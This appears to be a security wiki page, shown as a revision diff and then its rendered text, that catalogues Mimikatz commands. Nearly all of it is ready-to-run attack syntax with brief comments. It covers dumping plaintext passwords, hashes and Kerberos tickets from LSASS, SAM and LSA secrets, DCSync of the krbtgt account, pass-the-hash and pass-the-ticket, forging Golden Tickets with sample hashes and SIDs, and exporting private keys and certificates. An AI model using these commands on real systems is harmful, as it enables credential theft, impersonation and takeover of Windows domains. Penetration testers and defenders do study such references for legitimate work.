No edit summary |
No edit summary |
||
(7 intermediate revisions by one other user not shown) | |||
Line 1: | Line 1: | ||
[[Category:Tools]] | [[Category:Tools]] | ||
=Description= | |||
Mimikatz<ref>https://github.com/ParrotSec/mimikatz</ref> is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates. | |||
==== Links: ==== | |||
<syntaxhighlight lang="powershell"> | |||
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49 | |||
</syntaxhighlight> | |||
=Commands= | =Commands= | ||
==sekurlsa== | ==sekurlsa== | ||
<syntaxhighlight lang="powershell"> | <syntaxhighlight lang="powershell"> | ||
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP) | # Command is used to extract logon passwords from the Windows Security Support Provider (SSP) | ||
sekurlsa::logonpasswords | sekurlsa::logonpasswords | ||
# Command will extract all logon passwords, including those of network connections. | # Command will extract all logon passwords, including those of network connections. | ||
sekurlsa::logonPasswords full | sekurlsa::logonPasswords full | ||
# Command will export Kerberos tickets to a file. | # Command will export Kerberos tickets to a file. | ||
sekurlsa::tickets /export | sekurlsa::tickets /export | ||
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | # Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | ||
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd | sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd | ||
Line 18: | Line 28: | ||
# This command will list and export Kerberos tickets to a file. | # This command will list and export Kerberos tickets to a file. | ||
kerberos::list /export | kerberos::list /export | ||
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT. | # This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT. | ||
kerberos::ptt c:\chocolate.kirbi | kerberos::ptt c:\chocolate.kirbi | ||
# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID | # This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID | ||
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi | kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi | ||
</syntaxhighlight> | </syntaxhighlight> | ||
==crypto== | ==crypto== | ||
Line 29: | Line 40: | ||
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system. | This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system. | ||
crypto::capi | crypto::capi | ||
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system. | # This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system. | ||
crypto::cng | crypto::cng | ||
# This command is used to export certificates from a Windows system. | # This command is used to export certificates from a Windows system. | ||
crypto::certificates /export | crypto::certificates /export | ||
# This command is used to export certificates from the local machine certificate store of a Windows system. | # This command is used to export certificates from the local machine certificate store of a Windows system. | ||
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE | crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE | ||
# This command is used to export cryptographic keys from a Windows system. | # This command is used to export cryptographic keys from a Windows system. | ||
crypto::keys /export | crypto::keys /export | ||
# This command is used to export cryptographic keys from the local machine of a Windows system. | # This command is used to export cryptographic keys from the local machine of a Windows system. | ||
crypto::keys /machine /export | crypto::keys /machine /export | ||
</syntaxhighlight> | </syntaxhighlight> | ||
==vault & lsadump== | |||
<syntaxhighlight lang="powershell"> | |||
Extracts credentials from the Windows Vault. | |||
vault::cred | |||
Lists the contents of the Windows Vault. | |||
vault::list | |||
Elevates the current user's privileges to that of the Local System account. | |||
token::elevate | token::elevate | ||
Reverts the current user's privileges to their previous state before elevation. | |||
token::revert | |||
Dumps the Security Account Manager (SAM) database, which stores local user account information. | |||
lsadump::sam | lsadump::sam | ||
Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system. | |||
lsadump::secrets | lsadump::secrets | ||
Dumps the LSA secrets cache, which contains recently used authentication information. | |||
lsadump::cache | lsadump::cache | ||
Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller. | |||
lsadump::dcsync /user:domain\krbtgt /domain:lab.local | lsadump::dcsync /user:domain\krbtgt /domain:lab.local | ||
</syntaxhighlight> | |||
# | ==PTH== | ||
<syntaxhighlight lang="powershell"> | |||
# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | |||
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a | sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a | ||
# Attempts to authenticate as the specified user with the provided AES-256 hash. | |||
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | ||
# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash. | |||
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | ||
# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe. | |||
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe | sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe | ||
</syntaxhighlight> | |||
# | ==ekeys== | ||
<syntaxhighlight lang="powershell"> | |||
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory. | |||
sekurlsa::ekeys | sekurlsa::ekeys | ||
</syntaxhighlight> | |||
# | ==dapi == | ||
<syntaxhighlight lang="powershell"> | |||
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory. | |||
sekurlsa::dpapi | sekurlsa::dpapi | ||
</syntaxhighlight> | |||
# | ==minidump== | ||
<syntaxhighlight lang="powershell"> | |||
# Extracts information from a memory dump of the LSASS process. | |||
sekurlsa::minidump lsass.dmp | sekurlsa::minidump lsass.dmp | ||
</syntaxhighlight> | |||
# | ==PTT== | ||
<syntaxhighlight lang="powershell"> | |||
#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. | |||
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi | kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi | ||
</syntaxhighlight> | |||
# | ==Golden & Silver Tickets == | ||
<syntaxhighlight lang="powershell"> | |||
#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. | |||
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi | kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi | ||
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080 | kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080 | ||
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi | kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi | ||
</syntaxhighlight> | |||
# | ==tgt== | ||
<syntaxhighlight lang="powershell"> | |||
# Extracts Kerberos TGTs from the LSASS process memory. | |||
kerberos::tgt | kerberos::tgt | ||
# | # Removes TGTs from memory. | ||
kerberos::purge | kerberos::purge | ||
</syntaxhighlight> | |||
=References= | |||
<references /> |
Latest revision as of 04:47, 21 August 2023
Description
Mimikatz[1] is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.
Links:
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
Commands
sekurlsa
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords
# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full
# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos
# This command will list and export Kerberos tickets to a file.
kerberos::list /export
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi
# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng
# This command is used to export certificates from a Windows system.
crypto::certificates /export
# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export
# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export
vault & lsadump
Extracts credentials from the Windows Vault.
vault::cred
Lists the contents of the Windows Vault.
vault::list
Elevates the current user's privileges to that of the Local System account.
token::elevate
Reverts the current user's privileges to their previous state before elevation.
token::revert
Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam
Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets
Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache
Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
PTH
# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
ekeys
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys
dapi
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi
minidump
# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp
PTT
#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
Golden & Silver Tickets
#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
tgt
# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt
# Removes TGTs from memory.
kerberos::purge